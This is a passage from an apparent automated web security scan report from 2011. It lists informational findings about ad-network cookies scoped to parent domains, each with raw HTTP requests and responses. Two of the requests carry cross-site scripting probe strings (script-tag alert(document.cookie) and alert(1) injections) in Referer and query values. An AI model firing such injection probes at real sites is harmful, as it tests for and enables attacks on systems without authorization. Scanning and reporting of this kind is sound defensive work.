Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1484
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.co
...[SNIP]...

10.129. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1415
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldin
...[SNIP]...

10.130. http://syndication.mmismm.com/mmtnt.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mmtnt.php HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G=10120000000990801741

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: G=10120000000990801741; expires=Fri, 29-Jan-2016 03:57:39 GMT; path=/; domain=.mmismm.com
Content-Length: 462
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...

10.131. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TAGPUBLISH/getad.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TAGPUBLISH/getad.aspx?tagver=1&cd=1&if=0&ca=VIEWAD&cp=513102&ct=50151&cf=300X250&cn=1&rq=1&fldc=5&dw=1036&cwu=http%3A%2F%2Fevents.cbs6albany.com%2F%3F376e5%2522%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253Ea7771aeaee3%3D1&mrnd=63109582 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3NkvzOW21Ey13pWRGqBkRwaPNW5zUYvw9wUbeKXTZAbDcfCFvULUxnw; FC1-WC=^54144_2_2hYC9; CDSActionTracking6=bX5NnzxFBPJH|gFEcJzqCjXJj|526328|1998|6091|54144|108392|79777|3|427|3|middletownpress.com|2|8|1|0|2|1|2|TOT09|1|1|stCJdbHvpMtNcqViEwqQrHxEWkwXUKMsTK2ZnKOFzzU^|I|2hC8H|2sur9; cr=405|2|-8589049292256662518|1; V=gFEcJzqCjXJj; cwbh1=2709%3B02%2F23%2F2011%3BTOT09%0A2837%3B02%2F26%2F2011%3BRCQU1%3B02%2F27%2F2011%3BRCQU9; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2094
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Fri, 28 Jan 2011 17:37:49 GMT
Connection: close
Set-Cookie: V=gFEcJzqCjXJj; domain=.contextweb.com; expires=Sat, 28-Jan-2012 17:37:48 GMT; path=/
Set-Cookie: 513102_300X250_50151=1/28/2011 12:37:49 PM; domain=.contextweb.com; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Sat, 29-Jan-2011 05:00:00 GMT; path=/

var strCreative=''
+ '<script language="javascript" type="text/javascript"> \n'
+ ' document.write(\'<script type="text/javascript" language="javascript" src="http://optimized-by.rubiconproject.co
...[SNIP]...

10.132. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/?rt=iframe HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; put_1986=4760492999213801733; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; lm="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; put_1185=3011330574290390485; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; cd=false; dq=12|2|10|0; rdk2=0; ses2=7477^3; csi2=3178295.js^1^1296226112^1296226112&3138805.js^1^1296224077^1296224077; rdk=5804/7477; rdk15=0; ses15=7477^4; csi15=3174529.js^1^1296226115^1296226115&3187311.js^1^1296226114^1296226114&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; rpb=4214%3D1%264894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1%265328%3D1%264554%3D1%265671%3D1; put_2081=CA-00000000456885722

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:48:42 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=004826d0e57cb7385266145a629ee0301cc82296&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
Set-Cookie: dq=13|3|10|0; Expires=Sat, 28-Jan-2012 14:48:42 GMT; Path=/
Set-Cookie: put_2101=""; Domain=.rubiconproject.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lm="28 Jan 2011 14:48:42 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


10.133. http://tap.rubiconproject.com/oz/sensor

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor HTTP/1.1
Host: tap.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; ses15=7477^8; put_2132=D8DB51BF08484217F5D14AB47F4002AD; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; rdk15=0; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; rdk=5804/7477; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; dq=15|4|11|0; put_1994=6ch47d7o8wtv; SERVERID=; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7477^9; cd=false;

Response

HTTP/1.1 204 No Content
Date: Fri, 28 Jan 2011 17:06:05 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: dq=16|4|12|0; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Sat, 28-Jan-2012 17:06:05 GMT; Path=/
Set-Cookie: lm="28 Jan 2011 17:06:05 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


10.134. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=5804/7477 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="26 Jan 2011 20:13:41 GMT"; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; khaos=GIPAEQ2D-C-IOYY; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1185=3011330574290390485; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; cd=false; dq=15|4|11|0; put_2100=usr3fd748acf5bcab14; ses15=7477^8; csi15=3178300.js^1^1296232904^1296232904&3168345.js^1^1296232903^1296232903&3174529.js^2^1296226115^1296226129&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1; put_1197=3297869551067506954; rdk=5804/7477; rdk2=0; ses2=7477^9; csi2=3174527.js^5^1296226121^1296232915&3138805.js^2^1296224077^1296226130&3178295.js^1^1296226112^1296226112

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:41:56 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 943
Cache-control: private
Set-Cookie: khaos=GIPAEQ2D-C-IOYY; Domain=.rubiconproject.com; Expires=Sat, 26-Jan-2019 16:41:56 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Education,Beauty,Family and Parenting,Hobbies and Interests,Travel and Tourism High Affinity,Swing Voters",
tagcloud : [
{ tag
...[SNIP]...

10.135. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:09 GMT
Location: http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.693f3=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0|c51F37:693F3_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 228
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:09 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy?s_cid=$208$DISd42f2251fd9347828c931695680ca71619a6ca0eeddb444d9be1d8e2a327f4b1">here
...[SNIP]...

10.136. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=92c5b080-0b3b-470a-b91d-cc22156a51a6; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.6292a=0128111842; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:6292A_0_0_0_20B662_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 29 Jan 2011 00:59:18 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 00:59:18 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:04:18 GMT;path=/

GIF89a.............!.......,...........D..;

10.137. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Domain attribute on the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=43118469-708a-43ea-a596-af6467b86b10; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 01:41:08 GMT
Location: http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.6292a=0128111941; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111939; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B69B_0_0|c51F37:6292A_0_0_0_20B69D_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sat, 29 Jan 2011 01:41:08 GMT
Content-Length: 229
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150045525d5f4f58455e445a4a423660;expires=Sat, 29-Jan-2011 01:46:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-wsfy/?s_cid=$208$DISd42f2251fd9347828c931695680ca7169838e357ad6d4f7ebc46eb4eb4582e5e">her
...[SNIP]...

10.138. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Domain attribute on the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl?_ADTIME_ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
